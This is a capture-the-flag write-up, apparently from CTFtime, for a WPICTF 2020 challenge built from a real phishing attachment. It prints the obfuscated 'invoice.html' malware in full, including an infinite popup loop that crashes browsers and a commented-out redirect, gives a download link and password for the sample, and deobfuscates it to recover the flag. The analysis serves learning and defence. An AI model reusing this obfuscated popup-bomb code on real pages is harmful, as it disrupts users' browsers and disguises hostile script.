CTFtime.org / WPICTF 2020 / danger-Live-and-Malicious-Code / Writeup

# danger-Live-and-Malicious-Code

## Description

Like the title says, this challenge is dangerous and contains live malware.

Shoutout to the hacker that I stole this from challenge from. Sadly I can't give them credit because they sent the phish from a compromised email, but it's literally his/her code. I just defanged it (a little bit - it will still crash your webbrowser (usually, but don't test that outside of a VM)) and stuck a WPI flag in here.

To prevent accidental execution the file has been zipped with the password "I_understand_that_this_challenge_contains_LIVE_MALWARE"

http://us-east-1.linodeobjects.com/wpictf-challenge-files/invoice.zip

made by: The_Abjuri5t (John F.)

## Download and inspect the code

```
kali@kali:~/Downloads/wipctf$ wget http://us-east-1.linodeobjects.com/wpictf-challenge-files/invoice.zip
--2020-04-18 16:02:14-- http://us-east-1.linodeobjects.com/wpictf-challenge-files/invoice.zip
Resolving us-east-1.linodeobjects.com (us-east-1.linodeobjects.com)... 173.255.231.96, 45.79.157.59, 96.126.106.143, ...
Connecting to us-east-1.linodeobjects.com (us-east-1.linodeobjects.com)|173.255.231.96|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 729 [application/zip]
Saving to: ‘invoice.zip’

invoice.zip 100%[==================================>] 729 --.-KB/s in 0s

2020-04-18 16:02:14 (107 MB/s) - ‘invoice.zip’ saved [729/729]

kali@kali:~/Downloads/wipctf$ unzip invoice.zip
Archive: invoice.zip
[invoice.zip] invoice.html password:
inflating: invoice.html

kali@kali:~/Downloads/wipctf$ ls -l
total 8
-rw-r--r-- 1 kali kali 1243 Feb 22 22:29 invoice.html
-rw-r--r-- 1 kali kali 729 Apr 14 21:29 invoice.zip

kali@kali:~/Downloads/wipctf$ cat invoice.html
<html>
<head>
<title></title>
</head>
<body>
<script>var a = ['ps:','cte','5df','se_','toS','ing','tri','sub','lac','ryt','d}.','cod','pro','_no','ran','ing','dom','str','ete','rep'];function abc(def) { popupWindow = window.open( def,'popUpWindow','height=666,width=666,left=666,top=666') }(function(c, d) {var e = function(f) {while (--f) {c['push'](c['shift']());}};e(++d);}(a, 0xa8));var b = function(c, d) {c = c - 0x0;var e = a[c];return e;};var c = 'htt' + b('0xc') + '//t' + b('0x1') + b('0xe') + 'xc-' + 'rWP' + 'I';var d = '{Oh' + b('0x5') + b('0xf') + b('0x4') + b('0x3') + b('0x7') + '_d';var e = b('0xa') + b('0xd') + b('0x2') + 'net' + '/';var f = Math[b('0x6') + b('0x8')]()[b('0x10') + b('0x12') + 'ng'](0x6)[b('0x13') + b('0x9') + b('0x11')](0x2, 0xf) + Math['ran' + 'dom']()[b('0x10') + b('0x12') + 'ng'](0x10)[b('0x13') + b('0x9') + b('0x11')](0x2, 0xf);var g = Math['ran' + 'dom']()[b('0x10') + b('0x12') + 'ng'](0x24)[b('0x13') + b('0x9') + b('0x11')](0x2, 0xf) + Math[b('0x6') + b('0x8')]()['toS' + b('0x12') + 'ng'](0x24)[b('0x13') + b('0x9') + b('0x11')](0x2, 0xf);/*location[b('0xb') + b('0x0') + 'e'](c + d + e + '?' + f + '=' + g);*/for(var i=1;i===i;i++){abc(self.location,'_blank');}</script></body>
</html>
```

## Analysis

Use `uglifyjs -b` to demangle that javascript.

```javascript
var a = [ "ps:", "cte", "5df", "se_", "toS", "ing", "tri", "sub", "lac", "ryt", "d}.", "cod", "pro", "_no", "ran", "ing", "dom", "str", "ete", "rep" ];

function abc(def) {
popupWindow = window.open(def, "popUpWindow", "height=666,width=666,left=666,top=666");
}

(function(c, d) {
var e = function(f) {
while (--f) {
c["push"](c["shift"]());
}
};
e(++d);
})(a, 168);

var b = function(c, d) {
c = c - 0;
var e = a[c];
return e;
};

var c = "htt" + b("0xc") + "//t" + b("0x1") + b("0xe") + "xc-" + "rWP" + "I";

var d = "{Oh" + b("0x5") + b("0xf") + b("0x4") + b("0x3") + b("0x7") + "_d";

var e = b("0xa") + b("0xd") + b("0x2") + "net" + "/";

var f = Math[b("0x6") + b("0x8")]()[b("0x10") + b("0x12") + "ng"](6)[b("0x13") + b("0x9") + b("0x11")](2, 15) + Math["ran" + "dom"]()[b("0x10") + b("0x12") + "ng"](16)[b("0x13") + b("0x9") + b("0x11")](2, 15);

var g = Math["ran" + "dom"]()[b("0x10") + b("0x12") + "ng"](36)[b("0x13") + b("0x9") + b("0x11")](2, 15) + Math[b("0x6") + b("0x8")]()["toS" + b("0x12") + "ng"](36)[b("0x13") + b("0x9") + b("0x11")](2, 15);

for (var i = 1; i === i; i++) {
abc(self.location, "_blank");
}
```

The for loop at the bottom is an infinite loop to create pop-up windows. We definitely don't want to run that. The other variables look interesting though. The flag is being built from the array of strings on the first line.

## Solution

Let's print those variables out and see what happens.

```html
<html>
<head>
<title></title>
</head>
<body>
<script>
var a = [ "ps:", "cte", "5df", "se_", "toS", "ing", "tri", "sub", "lac", "ryt", "d}.", "cod", "pro", "_no", "ran", "ing", "dom", "str", "ete", "rep" ];

(function(c, d) {
var e = function(f) {
while (--f) {
c["push"](c["shift"]());
}
};
e(++d);
})(a, 168);

var b = function(c, d) {
c = c - 0;
var e = a[c];
return e;
};

var c = "htt" + b("0xc") + "//t" + b("0x1") + b("0xe") + "xc-" + "rWP" + "I";

var d = "{Oh" + b("0x5") + b("0xf") + b("0x4") + b("0x3") + b("0x7") + "_d";

var e = b("0xa") + b("0xd") + b("0x2") + "net" + "/";

document.write("a: " + a + "
\n");
document.write("b: " + b + "
\n");
document.write("c: " + c + "
\n");
document.write("d: " + d + "
\n");
document.write("e: " + e + "
\n");
document.write("f: " + f + "
\n");
document.write("g: " + g + "
\n");
</script>
</body>
</html>
```

Open `invoice_mod.html` in firefox and get:

```
a: lac,ryt,d}.,cod,pro,_no,ran,ing,dom,str,ete,rep,ps:,cte,5df,se_,toS,ing,tri,sub
b: function(c, d) { c = c - 0; var e = a[c]; return e; }
c: https://tryt5dfxc-rWPI
d: {Oh_nose_procoding_d
e: etected}.net/
f: 444423500012190de9ae4937da
g: deygcrb1hmfhgg1r9kty5a
```

The flag is:

```
WPI{Oh_nose_procoding_detected}
```

Original writeup (https://github.com/dobsonj/ctf/blob/master/writeups/2020/wpictf/danger-Live-and-Malicious-Code).

danger-Live-and-Malicious-Code

Comments

Sign in with